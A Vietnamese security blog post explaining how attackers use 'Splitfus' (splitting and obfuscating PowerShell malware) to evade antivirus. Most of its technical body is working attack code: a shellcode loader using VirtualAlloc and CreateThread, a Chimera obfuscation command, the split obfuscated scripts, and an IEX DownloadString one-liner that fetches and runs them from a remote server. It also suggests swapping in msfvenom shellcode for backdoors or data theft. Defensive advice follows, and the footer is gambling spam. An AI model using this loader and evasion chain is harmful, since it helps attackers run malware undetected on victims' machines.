• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

Hevin by Hevin
20/07/2025 - Updated on 25/07/2025
in Virus-Trojan-Rat
A A
0

Mục lục bài viết

  1. Cách phòng thủ trước kỹ thuật Splitfus
    1.  Tăng cường giám sát PowerShell
    2. Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)
    3. Kiểm tra hành vi tải động trong hệ thống
    4. Thiết lập kiểm soát truy cập mạng chặt chẽ
  2. Câu hỏi thường gặp
    1. Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?
    2. Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?
    3. Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Hiện nay, các hệ thống phòng thủ như Antivirus (AV) và Endpoint Detection & Response (EDR) ngày càng mạnh mẽ. Tuy nhiên, các nhóm hacker vẫn liên tục sáng tạo những kỹ thuật tinh vi để vượt qua lớp bảo vệ này. Một trong những kỹ thuật phổ biến đó là Splitfus. Đây là phương pháp chia nhỏ mã độc PowerShell và làm rối code (obfuscate), sau đó thực thi từng phần theo nhiều giai đoạn (staged delivery). Vậy vì sao kỹ thuật này lại hiệu quả đến vậy? Hãy cùng mình đi tìm hiểu nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Splitfus là gì ?

Splitfus (viết tắt của Split + Obfuscation) là kỹ thuật mà hacker sử dụng để:

Các bài viết liên quan

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 6

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus 7

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023 - Updated on 24/07/2025
Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén 8

Lỗ hổng WinRAR tự thực thi mã độc khi mở file nén

19/08/2023
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023 - Updated on 24/07/2025
  • Chia nhỏ (split) mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…
  • Làm rối (obfuscate) từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV
  • Thực thi theo nhiều giai đoạn (staged execution): Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi multi-stage attack hoặc fileless malware

Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?

  • Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)
  • AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn
  • Tránh quét tĩnh và sandbox
    • Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy
    • Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình
  • Bypass AMSI (Antimalware Scan Interface)
  • AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
    • Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ
    • Nhiều hacker còn kết hợp AMSI bypass với Splitfus để tăng hiệu quả
  • Linh hoạt và dễ cập nhật
  • Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn

Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện

Ví dụ thực tế

Nhiều chiến dịch tấn công APT và malware framework như Cobalt Strike, PowerShell Empire, Metasploit đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.

Xem thêm:  Phân biệt Trojan Worm, Virus khác nhau chỗ nào và cách phòng tránh

Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host “Invoke-Mimikatz” . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự “Invoke-Mimikatz”. Đây là một chữ ký (signature) cực kỳ nổi tiếng và đặc trưng của công cụ tấn công Mimikatz

Screenshot 2025-07-18 221618.png

Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.

Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi “Invoke-Mimikatz” thành nhiều chuỗi ngắn khác nhau.

Screenshot 2025-07-18 221712.png

Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus

Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1

[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)

Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ Chimera để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau

./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1

Screenshot 2025-07-19 121306.png

Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode

Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói

#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)
#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}

 

#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()
}

 

#sc4.ps1
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)

Các bước để thực hiện kĩ thuật Splitfus này cũng rất đơn giản. Đầu tiên, mình sử dụng lệnh sau để khởi tạo server Python trên cổng 80 với địa chỉ IP là 192.168.1.17:

Xem thêm:  Cách nhận biết máy tính bị nhiễm virus

python3 -m http.server 80

Server này sẽ lưu các file script PowerShell đã tách nhỏ và làm rối, cho phép máy nạn nhân tải xuống từng phần riêng biệt.

Cuối cùng mình tạo 1 đoạn lệnh thực thi ngắn gọn để thực thi trên máy nạn nhân

1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }

Lệnh này sẽ tải xuống và thực thi từng file script từ sc1.ps1 đến sc4.ps1. Đây là cách hiệu quả để vượt qua các cơ chế phát hiện mã độc vì mỗi phần riêng lẻ có thể trông vô hại. Khi kết hợp lại, chúng tạo thành một cuộc tấn công hoàn chỉnh mà nhiều giải pháp bảo mật không thể phát hiện

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 5

Với Metasploit, việc tạo shellcode trở nên dễ dàng hơn rất nhiều. Mình sẽ sử dụng lệnh msfvenom để tạo ra shellcode mới, sau đó thay thế vào script sc1.ps1. Điều này cho phép mình tùy biến cuộc tấn công theo nhiều hướng khác nhau, từ lấy quyền điều khiển máy tính nạn nhân đến đánh cắp thông tin hoặc cài đặt backdoor

https://streamable.com/rwoo4k

Và đó là những ví dụ đơn giản, nhưng thực tế, mã độc PowerShell không hề đơn giản như vậy. Các hacker sẽ phải dùng thêm kĩ thuật Bypass AMSI để tăng tỉ lệ thành công

Cách phòng thủ trước kỹ thuật Splitfus

Kỹ thuật Splitfus là một trong những phương pháp tấn công bằng PowerShell tinh vi, khó phát hiện nếu hệ thống không được giám sát chặt chẽ. Để phòng thủ hiệu quả trước Splitfus, đội ngũ an ninh mạng cần triển khai đồng bộ nhiều biện pháp chủ động, từ việc giám sát hành vi cho đến xây dựng hệ thống cảnh báo sớm và đào tạo người dùng cuối.

 Tăng cường giám sát PowerShell

PowerShell là công cụ thường bị lạm dụng trong các cuộc tấn công hiện đại. Để theo dõi hoạt động bất thường, hệ thống cần bật tính năng ghi nhật ký Script Block Logging (sử dụng Event ID 4104) kết hợp với Module Logging. Những thiết lập này giúp lưu lại toàn bộ lệnh PowerShell đã được thực thi, kể cả khi đã bị làm rối mã (obfuscate). Ngoài ra, nên kích hoạt chế độ Constrained Language Mode để hạn chế việc sử dụng các lệnh nguy hiểm trong môi trường thực thi PowerShell.

Xem thêm:  Hướng dẫn tạo virus giả troll bạn bè

Kích hoạt và bảo vệ AMSI (Antimalware Scan Interface)

AMSI là lớp phòng vệ quan trọng giúp phân tích mã trước khi được thực thi trong PowerShell. Việc đảm bảo AMSI luôn được bật và không bị vượt qua (bypass) là điều thiết yếu. Khi tích hợp cùng Microsoft Defender hoặc các giải pháp EDR có hỗ trợ quét AMSI, khả năng phát hiện mã độc bị làm rối sẽ được nâng cao rõ rệt, giúp ngăn chặn sớm các hành vi tấn công từ Splitfus.

Kiểm tra hành vi tải động trong hệ thống

Một đặc điểm thường thấy của Splitfus là sử dụng các tham số nguy hiểm trong PowerShell như EncodedCommand hoặc gọi hàm IEX để tải mã từ xa thông qua chuỗi như (New-Object Net.WebClient).DownloadString. Hệ thống EDR hoặc HIDS cần được cấu hình để nhận diện những hành vi này. Đồng thời, cần cảnh giác khi phát hiện script được tải về từ domain không đáng tin cậy, đặc biệt là các yêu cầu HTTP GET chứa tập tin đuôi .ps1.

Thiết lập kiểm soát truy cập mạng chặt chẽ

Kiểm soát truy cập mạng đóng vai trò quan trọng trong việc ngăn chặn Splitfus giao tiếp với máy chủ điều khiển (C2 server). Cần chủ động chặn các kết nối outbound đến địa chỉ IP hoặc domain nghi ngờ. Việc cấu hình proxy kết hợp với kiểm tra TLS (TLS inspection) sẽ giúp phát hiện các hành vi tải mã ẩn dưới kết nối được mã hóa. Bên cạnh đó, cập nhật liên tục các chỉ số tấn công (IOC) từ nguồn Threat Intelligence Feed sẽ nâng cao khả năng nhận diện và phản ứng kịp thời.

Cuối cùng, yếu tố con người luôn là mắt xích yếu nhất trong chuỗi phòng thủ. Việc tuyên truyền và đào tạo người dùng cuối nhằm nâng cao nhận thức bảo mật là điều bắt buộc. Nhân viên cần được hướng dẫn không chạy script từ các nguồn không rõ ràng. Đồng thời, kỹ năng nhận diện email giả mạo (phishing) cũng cần được chú trọng vì đây thường là điểm xuất phát của các cuộc tấn công Splitfus.

Câu hỏi thường gặp

Splitfus là gì và tại sao nó hiệu quả trong việc vượt qua Antivirus?

Splitfus là kỹ thuật hacker chia nhỏ mã độc PowerShell, làm rối code và thực thi từng phần. Điều này giúp giảm khả năng bị phát hiện dựa trên chữ ký, tránh quét tĩnh và sandbox, đồng thời bypass AMSI (Antimalware Scan Interface).

Kỹ thuật Splitfus hoạt động như thế nào trong thực tế?

Hacker chia mã độc thành nhiều đoạn nhỏ, mã hóa chúng và tải từng đoạn lên máy nạn nhân để thực thi. Việc này làm cho mã độc khó bị phát hiện hơn so với việc tải và thực thi một file mã độc lớn.

Có những công cụ nào hỗ trợ thực hiện kỹ thuật Splitfus?

Nhiều chiến dịch tấn công APT và framework malware như Cobalt Strike, PowerShell Empire, Metasploit sử dụng kỹ thuật tương tự Splitfus. Ngoài ra, các công cụ như Chimera có thể giúp làm rối mã nguồn PowerShell, hỗ trợ việc sử dụng kỹ thuật này.

Tags: mã độcSplitfusvirus
Hevin

Hevin

Related Posts

cach lay certificate phan mem khac
Virus-Trojan-Rat

Cấy Certificate từ App khác vào Virus để Bypass AV

08/01/2023 - Updated on 24/07/2025
Cách tạo Backdoor đơn giản với CMD 9
Virus-Trojan-Rat

Cách tạo Backdoor đơn giản với CMD

06/01/2023 - Updated on 24/07/2025
AnonyvietTrojan v1.2 - Update cho Linux OS và chức năng đính kèm virus 10
Virus-Trojan-Rat

AnonyvietTrojan v1.2 – Update cho Linux OS và chức năng đính kèm virus

04/12/2022 - Updated on 24/07/2025
Villain - Bypass AntiVirus chiếm quyền Shell Windows và Linux 11
Virus-Trojan-Rat

Villain – Bypass AntiVirus chiếm quyền Shell Windows và Linux

26/11/2022 - Updated on 24/07/2025
AT v1.1 - Update chức năng mã hóa RAT vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan v1.1 – Update mã hóa RAT vượt qua Windows Defender

04/11/2022 - Updated on 24/07/2025
AnonyvietTrojan - Công cụ giúp Virus vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan – Công cụ giúp Virus vượt qua Windows Defender

22/09/2022 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

ChatGPT Agent là gì? Cách sử dụng ra sao? 15

ChatGPT Agent là gì? Cách sử dụng ra sao?

by Thanh Kim
18/10/2025
0

Tổng hợp 17+ prompt tạo ảnh Halloween bằng AI ấn tượng 16

Tổng hợp 17+ prompt tạo ảnh Halloween bằng AI ấn tượng

by Thanh Kim
18/10/2025
0

Hướng dẫn cách tạo hồ cá trên màn hình iPhone 17

Hướng dẫn cách tạo hồ cá trên màn hình iPhone

by Thanh Kim
18/10/2025
0

Chuyển PDF thành ảnh PNG online bằng AI cực dễ 18

Chuyển PDF thành ảnh PNG online bằng AI cực dễ

by Thanh Kim
17/10/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • HAI trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • thịnh trong Hướng dẫn nhận key IObit Uninstaller 14 miễn phí 6 tháng
  • veoe trong Bí quyết tạo ảnh cầm bó hoa đẹp như bìa tạp chí với Nano Banana
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • mon trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Felizz23 trong Namecheap khuyến mãi 3 Domain giá 0$
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • ann trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Kim trong Namecheap khuyến mãi 3 Domain giá 0$
  • em hậu trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • Võ Sĩ Cua trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Tuấn Tú trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Quốc Vũ trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Ski trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • linh trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Heheehe🐧 trong Top 10 Phần mềm miễn phí cho Windows 11 nên cài
  • Jdi trong Download Hack of Products v5 APK – Hack vật phẩm trên Android
  • Hoàng Na trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • nam trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • HOA trong Cách chuyển Văn bản thành Giọng nói không giới hạn thời gian

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay trực tiếp bóng đá xoilac colatv truc tiep bong da xoilac 8x bet https://cwfun.org/ 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 xn88 kubet RR88 cakhiatv f8bet https://qq883a.com/ XX88 Leo88 mu88 casino https://u888.one/ https://sunwin10.org/ f168 fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 vip66 xoso66 https://tp88fun.com/ daga hello88 qq88 GK88 PG88 SV388 PG88 Xoso66 Vip66 hitclub bong99 Ga6789 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 Thabet press ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin https://ok9393.com/ nhà cái bj88 sv368pro https://xx88.space/ xoilac cakhiatv socolive QQ88 TP88 Xoso66 xoso66 u888 79king pg88 f168 88vv https://mm88.today/ mu88 com 8kbet https://qq88pro.vip/ xoso66 98win fun88.supply king88 33win sv388 v9bet s666 https://max88rl.com/ https://ok365rl.com/ EE88 FB88 TYPHU88 https://xx88.ink/ https://da88.design/ 789f Kkwin go88 bj8888 79king 58win xin88 XX88 VSBET 23WIN https://mb66co.com/ https://fun88.supply/ pg88 colatv truc tiep bong da thapcamtv thapcamtv https://rr88.navy/ https://e2beting.com/ gem88 bk8 bk8 F8BET80 typhu88 k8cc sa88 https://q23win.com/ 32win 32win 78win 68win BET88 68win luongsontv luongsontv https://vankhanhtv.cc/ 9bet https://nohutm.com SODO fun88 sunwin BL555 u888 https://nohumo.com 8xbet W88 link cola tv colatv trực tiếp bóng dá colatv trực tiếp bóng dá colatv colatv truc tiep bong da colatv colatv bóng dá trực tiếp 58win https://s68win.com/ 58WIN NOHU90 https://hm8805.com/ GK88 https://go991.club/ 188bet ax88 8KBET 69VN 33WIN 32win Kuwin https://bbet88b.com/ Jun88.estate gavangtv gavangtv OK9 SHBET nohu90 https://xx88.center/ trực tiếp bóng rổ vswin uu88 HM88 NỔ HỦ ĐỔI THƯỞNG 789PCOM NHÀ CÁI MMOO bắn cá TT88COM GO 99 F168 https://k8cc.wiki/ https://betvisa.wales/ https://12betp1.com/ https://loto188.im/ https://celinediontv.com/ https://sun-n-fun.com/ RR88 RR88 https://qq88.studio/ ee88 https://kjc88.com.de/ tài xỉu online uy tín Game bài đổi thưởng uy tín kèo nhà cái kèo 